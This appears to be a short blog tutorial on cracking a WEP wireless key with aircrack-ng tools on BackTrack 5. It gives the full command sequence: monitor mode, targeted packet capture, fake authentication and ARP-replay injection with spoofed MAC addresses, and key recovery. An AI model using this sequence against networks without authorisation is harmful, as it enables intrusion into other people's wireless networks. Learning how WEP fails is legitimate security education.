Wireless Hacking - WEP Key Crack

Tip

Wireless Hacking - WEP Key Crack

do9dark 2016. 9. 3. 17:21

0x00. 환경구성

OS : BackTrack 5 R3 (32-bit)

Kernel : Linux bt 3.2.6

0x01. iwconfig

Configure a wireless network interface.

iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.

# iwconfig

0x02. airmon-ng

airmon-ng is script can be used to enable monitor mode on wireless interfaces.

airmon-ng <start|stop> <interface>

# airmon-ng start wlan0

0x03. airodump-ng

A wireless packet capture tool for aircrack-ng.

airodump-ng [options] <interface>

# airodump-ng mon0

To capture a specific wireless.

[Options]

-c <channel>[,<channel>[, ...]]

--channel <channel>[,<channel>[, ...]]

: Indicate the channel(s) to listen to. By default airodump-ng hop on 2.4GHz channels.

-w <prefix>

--wirte <prefix>

: Is the dump file prefix to use. If this option is not given, it will only show data on the screen. Beside this file a CSV file with the same filename as the capture will be created.

[Filter options]

-d <bssid>

--bssid <bssid>

: It will only show networks, matching the given bssid.

# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w WEP-Key mon0

0x04. aireplay-ng

Inject packets into a wireless network to generate traffic.

The fake authentication attack.

aireplay-ng <options> <replay interface>

[Attack modes]

-1 <delay>

--fakeauth=<delay>

: The fake authentication attack allows you to perform the two types of WEP authentication(Open System and Shared Key) plus associate with the access point (AP).

[Replay options]

-e <essid>

: Fake Authentication attack

: Set target SSID.

-a <bssid>

: Set Access Point MAC address.

-h <smac>

: Set source MAC address.

# aireplay-ng -1 0 -e WEP -a 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0

The class ARP request replay attack.

aireplay-ng <options> <replay interface>

[Attack modes]

-3

--arpreplay

: The class ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably.

[Filter options]

-b <bssid>

: MAC address of Access Point.

[replay options]

-h <bssid>

: Set Access Point MAC address.

# aireplay-ng -3 -b 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0

0x05. aircrack-ng

A 802.11 WEP / WPA-PSK Key Cracker.

aircrack-ng [options] <.cap / .ivs file(s)>

# aircrack-ng WEP-Key-01.cap